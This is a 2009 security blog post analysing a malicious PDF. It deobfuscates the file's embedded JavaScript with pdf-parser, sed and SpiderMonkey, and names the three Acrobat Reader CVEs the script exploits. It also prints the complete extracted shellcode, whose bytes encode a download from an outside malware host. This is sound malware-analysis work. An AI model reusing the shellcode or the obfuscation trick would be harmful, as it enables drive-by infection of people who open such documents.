-->

Exploits: Analyzing a malicious PDF Document

December 21, 2009  |  Jaime Blasco

In this post, I will explain a real case example of how to manually analyze a malicious PDF document.

Some days ago I collected a malicious PDF file, usually, Wepawet does an excellent job and automatically analyze the malicious file for you.

In this case, Wepawet said “No exploits were identified.” so probably the malicious PDF file uses some tricks against automatic analysis.

We start collecting some information of the PDF file:

MD5: 67f3da49ac07e6a5b3be1a743c3ea40d

Collect some PDF object information to begin the analysis using Didier Stevens pdfid.py:

mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php

PDFiD 0.0.9 pdf.php

 PDF Header: %PDF-1.4

 obj                    9

 endobj                 9

 stream                 3

 endstream              3

 xref                   1

 trailer                1

 startxref              1

 /Page                  1

 /Encrypt               0

 /ObjStm                0

 /JS                    1

 /JavaScript            2

 /AA                    0

 /OpenAction            0

 /AcroForm              0

 /JBIG2Decode           0

 /RichMedia             0

 /Colors > 2^24         0

Now we know there is some javascript and filter objects we should analyze, first we search for Filter objects inside the PDF using Didier Stevens pdf-parser.py:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php

obj 5 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



obj 6 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 299

   /Filter /FlateDecode



 >>

We have two streams that should be carefully analyzed, let’s see the raw data of obj 5 0:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more

obj 5 0

 Type:

 Referencing:

 Contains stream



<< /Length 4852 /Filter /FlateDecode

 >>



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



 colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa

443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd

assa 443562df sdfs

23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df…......

...........

...........

...........

We have 172K of stream data, we save it for later analyze. Now dump the obj 6 raw data:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more

obj 6 0

 Type:

 Referencing:

 Contains stream



<< /Length 299 /Filter /FlateDecode

 >>



 <<

   /Length 299

   /Filter /FlateDecode



 >>

This is much better, we have some javascript eval, unescape functions and a reference to this.info.title.

If we inspect the info.title we realize it’s linked with the obj 5 0 data with extracted.

As we can see, the javascript code replace “colkokasd assa 443562df sdfs232342” from the obj 5 stream with the var uWReX84wKBTnU (”%”)

To emulate the javascript code, first we dump the obj5 data and then use sed to replace data:

python pdf-parser.py --object 5 --raw --filter pdf.php > obj5

sed -i "s/colkokasd assa 443562df sdfs232342/%/g" obj5

We create a js file with the data replace inside var JmfNzd7NdGNhf = “%66%75%6e%63%74%69%6f%6…....... ” and then call print(unescape(JmfNzd7NdGNhf));.

If we execute the file with SpiderMonkey:

mac-jaime:pdf1 jaimeblasco$ js obj_5.js

Now we have the unobfuscated javascript code. The PPPDDDFF() version check for the Acrobat Reader version using the app.viewerVersion Adobe Javascript function and exploits a different vulnerability on each of the identified versions:

  • CVE-2007-5659: Exploiting Collab.collectEmailInfo()
  • CVE-2008-2992: Exploiting util.printf()
  • CVE-2009-0927: Exploiting Collab.getIcon()

We also found a shellcode, here is the raw data extracted using SpiderMonkey:

shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \

                        "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \

                        "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \

                        "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \

                        "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \

                        "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \

                        "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \

                        "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \

                        "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \

                        "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \

                        "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \

                        "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \

                        "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \

                        "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \

                        "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"

The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX), here is the analysis data:

  • VirusTotal

Share this with others

Featured resources

 

 

2024 Futures Report

Get price Free trial